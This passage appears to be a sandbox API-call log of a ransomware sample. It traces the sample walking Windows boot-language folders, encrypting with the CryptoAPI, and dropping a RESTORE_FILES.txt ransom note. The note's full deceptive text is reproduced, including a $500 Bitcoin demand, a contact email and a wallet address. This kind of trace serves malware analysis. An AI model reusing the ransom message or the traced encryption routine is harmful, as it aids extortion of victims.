[0044.706] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f60c | out: pbBuffer=0x295f60c) returned 1 [0044.706] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c80*, pdwDataLen=0x295f634*=0x20, dwBufLen=0x30 | out: pbData=0x447c80*, pdwDataLen=0x295f634*=0x30) returned 1 [0044.706] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.706] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.706] lstrcmpiW (lpString1="nb-NO", lpString2="Windows") returned -1 [0044.706] lstrcmpiW (lpString1="nb-NO", lpString2="Program Files") returned -1 [0044.706] lstrcmpiW (lpString1="nb-NO", lpString2="Program Files (x86)") returned -1 [0044.706] lstrcmpiW (lpString1="nb-NO", lpString2="$Recycle.bin") returned 1 [0044.706] lstrcmpiW (lpString1="nb-NO", lpString2="System Volume Information") returned -1 [0044.706] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO") returned 17 [0044.706] lstrcmpW (lpString1="nb-NO", lpString2=".") returned 1 [0044.706] lstrcmpW (lpString1="nb-NO", lpString2="..") returned 1 [0044.707] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\*") returned 19 [0044.707] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\nb-NO\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c80 [0044.707] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.707] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.707] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.707] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.707] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.707] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\.") returned 19 [0044.707] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.707] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.707] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.707] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0044.707] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.707] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.707] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.707] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\..") returned 20 [0044.708] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.708] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.708] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.708] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0044.708] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0044.708] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0044.708] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0044.708] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0044.708] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned 33 [0044.708] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".protected") returned 0x0 [0044.708] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="RESTORE_FILES.txt") returned -1 [0044.708] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.708] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.708] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.709] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0044.709] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0044.709] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\RESTORE_FILES.txt") returned 35 [0044.709] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\RESTORE_FILES.txt" (normalized: "c:\\boot\\nb-no\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0044.709] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.709] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0044.710] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0044.710] WriteFile (in: hFile=0xac, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0044.710] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.710] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0044.710] CloseHandle (hObject=0xac) returned 1 [0044.710] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.710] lstrcmpiW (lpString1="nl-NL", lpString2="Windows") returned -1 [0044.710] lstrcmpiW (lpString1="nl-NL", lpString2="Program Files") returned -1 [0044.710] lstrcmpiW (lpString1="nl-NL", lpString2="Program Files (x86)") returned -1 [0044.710] lstrcmpiW (lpString1="nl-NL", lpString2="$Recycle.bin") returned 1 [0044.710] lstrcmpiW (lpString1="nl-NL", lpString2="System Volume Information") returned -1 [0044.710] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL") returned 17 [0044.710] lstrcmpW (lpString1="nl-NL", lpString2=".") returned 1 [0044.710] lstrcmpW (lpString1="nl-NL", lpString2="..") returned 1 [0044.710] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\*") returned 19 [0044.710] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\nl-NL\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c80 [0044.710] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.710] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.710] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.710] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.710] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.710] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\.") returned 19 [0044.710] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.710] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.711] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.711] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0044.711] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.711] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.711] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.711] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\..") returned 20 [0044.711] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.711] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.711] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.711] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0044.711] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0044.711] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0044.711] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0044.711] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0044.711] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned 33 [0044.711] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".protected") returned 0x0 [0044.711] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="RESTORE_FILES.txt") returned -1 [0044.711] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.711] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.711] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.711] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0044.711] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0044.711] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\RESTORE_FILES.txt") returned 35 [0044.711] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\RESTORE_FILES.txt" (normalized: "c:\\boot\\nl-nl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0044.712] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.712] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0044.712] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0044.712] WriteFile (in: hFile=0xac, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0044.712] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.712] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0044.712] CloseHandle (hObject=0xac) returned 1 [0044.713] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.713] lstrcmpiW (lpString1="pl-PL", lpString2="Windows") returned -1 [0044.713] lstrcmpiW (lpString1="pl-PL", lpString2="Program Files") returned -1 [0044.713] lstrcmpiW (lpString1="pl-PL", lpString2="Program Files (x86)") returned -1 [0044.713] lstrcmpiW (lpString1="pl-PL", lpString2="$Recycle.bin") returned 1 [0044.713] lstrcmpiW (lpString1="pl-PL", lpString2="System Volume Information") returned -1 [0044.713] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL") returned 17 [0044.713] lstrcmpW (lpString1="pl-PL", lpString2=".") returned 1 [0044.713] lstrcmpW (lpString1="pl-PL", lpString2="..") returned 1 [0044.713] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\*") returned 19 [0044.713] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pl-PL\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c80 [0044.713] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.713] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.713] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.713] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.713] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.713] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\.") returned 19 [0044.713] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.713] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.713] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.713] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0044.713] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.713] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.713] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0044.713] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\..") returned 20 [0044.713] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0044.713] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.713] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.713] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0044.714] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0044.714] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0044.714] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0044.714] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0044.714] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned 33 [0044.714] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".protected") returned 0x0 [0044.714] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="RESTORE_FILES.txt") returned -1 [0044.714] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0044.714] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x447cc0*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0044.714] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0044.716] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0044.716] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0044.716] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\RESTORE_FILES.txt") returned 35 [0044.716] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\RESTORE_FILES.txt" (normalized: "c:\\boot\\pl-pl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0044.716] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0044.716] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0044.717] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0044.717] WriteFile (in: hFile=0xac, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0044.717] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0044.717] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0044.717] CloseHandle (hObject=0xac) returned 1 [0044.717] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0044.717] lstrcmpiW (lpString1="pt-BR", lpString2="Windows") returned -1 [0044.717] lstrcmpiW (lpString1="pt-BR", lpString2="Program Files") returned 1 [0044.717] lstrcmpiW (lpString1="pt-BR", lpString2="Program Files (x86)") returned 1 [0044.717] lstrcmpiW (lpString1="pt-BR", lpString2="$Recycle.bin") returned 1 [0044.717] lstrcmpiW (lpString1="pt-BR", lpString2="System Volume Information") returned -1 [0044.717] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR") returned 17 [0044.717] lstrcmpW (lpString1="pt-BR", lpString2=".") returned 1 [0044.717] lstrcmpW (lpString1="pt-BR", lpString2="..") returned 1 [0044.717] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\*") returned 19 [0044.717] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pt-BR\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x447c80 [0044.718] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0044.718] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0044.718] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0044.718] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0044.718] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0044.718] wnsprintfW (in: pszDest=0x46a5e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\.") returned 19 [0044.718] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.718] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0044.718] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0044.718] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0044.718] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0044.718] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0044.718] 